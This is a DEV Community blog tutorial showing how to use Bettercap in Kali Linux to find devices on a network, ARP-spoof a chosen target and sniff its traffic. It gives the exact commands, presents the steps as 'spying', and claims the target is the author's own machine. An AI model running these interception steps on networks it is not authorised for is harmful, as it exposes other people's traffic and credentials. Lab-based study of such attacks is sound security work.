DEV Community

Cover image for Hacking the Network: Spying on Devices with Bettercap in Kali Linux
KARAN JAIN
KARAN JAIN

Posted on

3 1 1 1 1

Hacking the Network: Spying on Devices with Bettercap in Kali Linux

Here's a step-by-step guide for using Bettercap to spy on devices within a network. Note that this is for educational and ethical purposes only.

Image description

Disclaimer
This guide is for educational purposes only. We are attacking and monitoring our own Windows machine on a private network to track activities. Unauthorized use on other devices or networks is illegal.

With this method, no additional Wi-Fi monitoring tools are needed. Bettercap itself is powerful enough to intercept and analyze network traffic directly, making it a versatile option for tracking activities on your network or device.

Step 1:Installing buttercap tool

-->Open Kali Linux
-->Go to the terminal in Kali Linux
-->For moving from normal directories to root directories, Give the command

sudo su
Enter fullscreen mode Exit fullscreen mode

Enter your password.
-->Install bettercap by giving the command

sudo apt install bettercap
Enter fullscreen mode Exit fullscreen mode

Image description

-->To verify the installation, Run:

bettercap --version
Enter fullscreen mode Exit fullscreen mode

If installed correctly, the version will be displayed.

Step 2:Run bettercap

--> Run the command:

sudo bettercap
Enter fullscreen mode Exit fullscreen mode

Image description

Step 3:Getting all device's IP addresses which are connected to the same network in our Kali Linux

--> Just run command

net.probe on
Enter fullscreen mode Exit fullscreen mode

You have all the IP addresses of connected devices but they are not arranged properly, To arrange them run command:

net.show
Enter fullscreen mode Exit fullscreen mode

Image description

step 4:Set the target devices on which we are spying by giving their IP addresses

-->Enable ARP spoofing to intercept traffic:

set arp.spoof.targets <target_ip>
Enter fullscreen mode Exit fullscreen mode

-->Start ARP spoofing:

arp.spoof on
Enter fullscreen mode Exit fullscreen mode

Image description

Step 5:To display captured data from the target device

-->Enable the network sniffer

net.sniff on
Enter fullscreen mode Exit fullscreen mode

Image description

You can see all the data or packets are captured from target device at current time

For Demo

(we are capturing all current network/data of Windows machine on our kali Linux which is a different machine)

Image description

Now we can see all the activities of target devices

Step 6:To exit

-->Run:

exit
Enter fullscreen mode Exit fullscreen mode

Image description

shhhhhh!!! Keep it a top secret!!

AWS Security LIVE! Stream

Streaming live from AWS re:Inforce

Join AWS Security LIVE! at re:Inforce for real conversations with AWS Partners.

Learn More

Top comments (0)

ACI image

ACI.dev: Fully Open-source AI Agent Tool-Use Infra (Composio Alternative)

100% open-source tool-use platform (backend, dev portal, integration library, SDK/MCP) that connects your AI agents to 600+ tools with multi-tenant auth, granular permissions, and access through direct function calling or a unified MCP server.

Check out our GitHub!

AWS Security LIVE! From re:Inforce 2025

Tune into AWS Security LIVE! streaming live from the AWS re:Inforce expo floor in Philadelphia from 8:00AM ET-6:00PM ET.

Tune in to the full event

DEV is partnering to bring live events to the community. Join us or dismiss this billboard if you're not interested. ❤️